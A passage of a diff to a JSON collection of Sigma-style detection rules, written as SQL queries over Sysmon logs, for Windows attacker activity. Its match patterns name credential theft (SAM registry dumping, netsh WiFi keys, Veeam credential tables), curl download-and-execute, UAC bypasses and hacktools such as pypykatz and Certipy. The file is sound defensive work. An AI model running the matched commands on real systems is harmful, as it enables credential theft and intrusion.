'% .exe' ESCAPE '\\' OR Image LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR Image LIKE '%.doc.js' ESCAPE '\\' OR Image LIKE '%.docx.js' ESCAPE '\\' OR Image LIKE '%.xls.js' ESCAPE '\\' OR Image LIKE '%.xlsx.js' ESCAPE '\\' OR Image LIKE '%.ppt.js' ESCAPE '\\' OR Image LIKE '%.pptx.js' ESCAPE '\\' OR Image LIKE '%.rtf.js' ESCAPE '\\' OR Image LIKE '%.pdf.js' ESCAPE '\\' OR Image LIKE '%.txt.js' ESCAPE '\\') AND 
(CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_double_extension.yml" + "filename": "proc_creation_win_lolbin_printbrm.yml" }, { - "title": "Command Line Execution with Suspicious URL and AppData Strings", - "id": "1ac8666b-046f-4201-8aba-1951aaec03a3", + "title": "Invoke-Obfuscation VAR+ Launcher", + "id": "27aec9c9-dbb0-4939-8422-1742242471d0", "status": "test", - "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - 
"attack.command_and_control", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1105" + "attack.t1059.001" ], "falsepositives": [ - "High" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\' AND CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_http_appdata.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" }, { - "title": "Audio Capture via PowerShell", - "id": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "title": "Harvesting Of Wifi Credentials Via Netsh.EXE", + "id": "42b1a5b8-353f-4f10-b256-39de4467faff", "status": "test", - "description": "Detects audio capture via PowerShell Cmdlet.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detect the harvesting of wifi credentials using netsh.exe", + "author": "Andreas Hunkeler (@Karneades), oscd.community", "tags": [ - "attack.collection", - "attack.t1123" + "attack.discovery", + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Legitimate audio capture by legitimate user." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%WindowsAudioDevice-Powershell-Cmdlet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%wlan%' ESCAPE '\\' AND CommandLine LIKE '% s%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '% k%' ESCAPE '\\' AND CommandLine LIKE '%=clear%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_audio_capture.yml" + "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml" }, { - "title": "Potential Product Reconnaissance Via Wmic.EXE", - "id": "15434e33-5027-4914-88d5-3d4145ec25a9", - "status": "experimental", - "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", - "author": "Nasreddine Bencherchali", + "title": "HackTool - Pypykatz Credentials Dumping Activity", + "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "status": "test", + "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. 
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%Product%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR Image LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_recon_product.yml" + "filename": "proc_creation_win_hktl_pypykatz.yml" }, { - "title": "Potential SquiblyTwo Technique Execution", - "id": "8d63dadf-b91b-4187-87b6-34a1114577ea", - "status": "test", - "description": "Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields", - "author": "Markus Neis, Florian Roth", + "title": "Read Contents From Stdin Via Cmd.EXE", + "id": "241e802a-b65e-484f-88cd-c2dc10f9206d", + "status": "experimental", + "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1047", - "attack.t1220", "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1059.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe' OR Imphash IN 
('1B1A3F43BF37B5BFE60751F2EE2F326E', '37777A96245A3C74EB217308F3546F4C', '9D87C9D67CE724033C0B40CC4CA1B206') OR (Hashes LIKE '%IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=37777A96245A3C74EB217308F3546F4C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206%' ESCAPE '\\')) AND (CommandLine LIKE '%format:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%<%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_squiblytwo_bypass.yml" + "filename": "proc_creation_win_cmd_stdin_redirect.yml" }, { - "title": "Potential Suspicious Activity Using SeCEdit", - "id": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", + "title": "Mavinject Inject DLL Into Running Process", + "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", "status": "experimental", - "description": "Detects potential suspicious behaviour using secedit.exe. 
Such as exporting or modifying the security policy", - "author": "Janantha Marasinghe", + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ - "attack.discovery", - "attack.persistence", "attack.defense_evasion", - "attack.credential_access", "attack.privilege_escalation", - "attack.t1562.002", - "attack.t1547.001", - "attack.t1505.005", - "attack.t1556.002", - "attack.t1562", - "attack.t1574.007", - "attack.t1564.002", - "attack.t1546.008", - "attack.t1546.007", - "attack.t1547.014", - "attack.t1547.010", - "attack.t1547.002", - "attack.t1557", - "attack.t1082" + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ - "Legitimate administrative use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\secedit.exe' ESCAPE '\\' OR OriginalFileName = 'SeCEdit') AND ((CommandLine LIKE '%/export%' ESCAPE '\\' AND CommandLine LIKE '%/cfg%' ESCAPE '\\') OR (CommandLine LIKE '%/configure%' ESCAPE '\\' AND CommandLine LIKE '%/db%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_secedit_execution.yml" + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features", - "id": "a383dec4-deec-4e6e-913b-ed9249670848", + "title": "Potential Renamed Rundll32 Execution", + "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", "status": "experimental", - "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". 
Which allows the user to install untrusted packages.", + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" }, { - "title": "Suspicious Regsvr32 Execution With Image Extension", - "id": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", + "title": "Suspicious Key Manager Access", + "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "status": "experimental", - "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as image files", - "author": "frack113", + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND (CommandLine LIKE '%.bmp' ESCAPE '\\' OR CommandLine LIKE '%.cr2' ESCAPE '\\' OR CommandLine LIKE '%.eps' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.ico' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.nef' ESCAPE '\\' OR CommandLine LIKE '%.orf' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.raw' ESCAPE '\\' OR CommandLine LIKE '%.sr2' ESCAPE '\\' OR CommandLine LIKE '%.tif' ESCAPE '\\' OR CommandLine LIKE '%.tiff' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_image.yml" + "filename": "proc_creation_win_rundll32_keymgr.yml" }, { - "title": "Use Short Name Path in Command Line", - "id": "349d891d-fef0-4fe4-bc53-eee623a15969", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "author": "frack113, Nasreddine Bencherchali", + "title": "Exploit for CVE-2015-1641", + "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "status": "stable", + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1036.005" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." 
+ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%~1\\\\%' ESCAPE '\\' OR CommandLine LIKE '%~2\\\\%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\GPSoftware\\\\Directory Opus\\\\dopus.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\veam.backup.shell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winget.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Everything\\\\Everything.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%\\\\appdata\\\\local\\\\webex\\\\webex64\\\\meetings\\\\wbxreport.exe%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\cmd\\\\scalar.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" + "filename": "proc_creation_win_exploit_cve_2015_1641.yml" }, { - "title": "Query Usage To Exfil Data", - "id": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", - "status": "experimental", - "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", + "title": "New User Created Via Net.EXE With Never Expire Option", + "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "status": "test", + "description": "Detects creation of local users via the net.exe command with the option \"never 
expire\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%:\\\\Windows\\\\System32\\\\query.exe' ESCAPE '\\' AND (CommandLine LIKE '%session >%' ESCAPE '\\' OR CommandLine LIKE '%process >%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_query_session_exfil.yml" + "filename": "proc_creation_win_net_user_add_never_expire.yml" }, { - "title": "Curl Download And Execute Combination", - "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", + "title": "Lazarus Group Activity", + "id": "24c4d154-05a4-4b99-b57d-9b977472443a", "status": "test", - "description": "Adversaries can use curl to download payloads remotely and execute them. 
Curl is included by default in Windows 10 build 17063 and later.", - "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ + "attack.g0032", "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE 
'\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" + "filename": "proc_creation_win_apt_lazarus_group_activity.yml" }, { - "title": "Conti NTDS Exfiltration Command", - "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", + "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", "status": "test", - "description": "Detects a command used by conti to exfiltrate NTDS", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects dump of credentials in VeeamBackup dbo", + "author": "frack113", "tags": [ "attack.collection", - "attack.t1560" + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_7zip.yml" + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" }, { - "title": "Deleted Data Overwritten Via Cipher.EXE", - "id": "4b046706-5789-4673-b111-66f25fe99534", - "status": "experimental", - "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", - "author": "frack113", + 
"title": "UAC Bypass Using NTFS Reparse Point - Process", + "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'CIPHER.EXE' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\') AND CommandLine LIKE '% /w:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND Image LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cipher_overwrite_deleted_data.yml" + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "PUA - CleanWipe Execution", - "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "title": "HackTool - Certipy Execution", + "id": "6938366d-8954-4ddc-baff-c830b3ba8fcd", "status": "experimental", - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "author": "Nasreddine Bencherchali 
(Nextron Systems)", + "description": "Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Legitimate administrative use (Should be investigated either way)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (Image LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (Image LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (Image LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Certipy.exe' ESCAPE '\\' OR OriginalFileName = 'Certipy.exe' OR Description LIKE '%Certipy%' ESCAPE '\\') OR ((CommandLine LIKE '% auth %' ESCAPE '\\' OR CommandLine LIKE '% find %' ESCAPE '\\' OR CommandLine LIKE '% forge %' ESCAPE '\\' OR CommandLine LIKE '% relay %' ESCAPE '\\' OR CommandLine LIKE '% req %' ESCAPE '\\' OR CommandLine LIKE '% shadow %' ESCAPE '\\') AND (CommandLine LIKE '% -bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -ca-pfx %' ESCAPE '\\' OR CommandLine LIKE '% -dc-ip %' ESCAPE '\\' OR CommandLine LIKE '% -kirbi%' ESCAPE '\\' OR CommandLine LIKE '% -old-bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -pfx %' ESCAPE '\\' OR CommandLine LIKE '% -target%' ESCAPE '\\' OR CommandLine LIKE '% -username %' ESCAPE '\\' OR CommandLine LIKE '% -vulnerable%' ESCAPE '\\' OR CommandLine LIKE '%auth -pfx%' ESCAPE '\\' OR CommandLine LIKE '%shadow auto%' 
ESCAPE '\\' OR CommandLine LIKE '%shadow list%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_pua_cleanwipe.yml" + "filename": "proc_creation_win_hktl_certipy.yml" }, { - "title": "HackTool - Empire PowerShell UAC Bypass", - "id": "3268b746-88d8-4cd3-bffc-30077d02c787", - "status": "stable", - "description": "Detects some Empire PowerShell UAC bypass methods", - "author": "Ecco", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", + "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "status": "experimental", + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" ], 
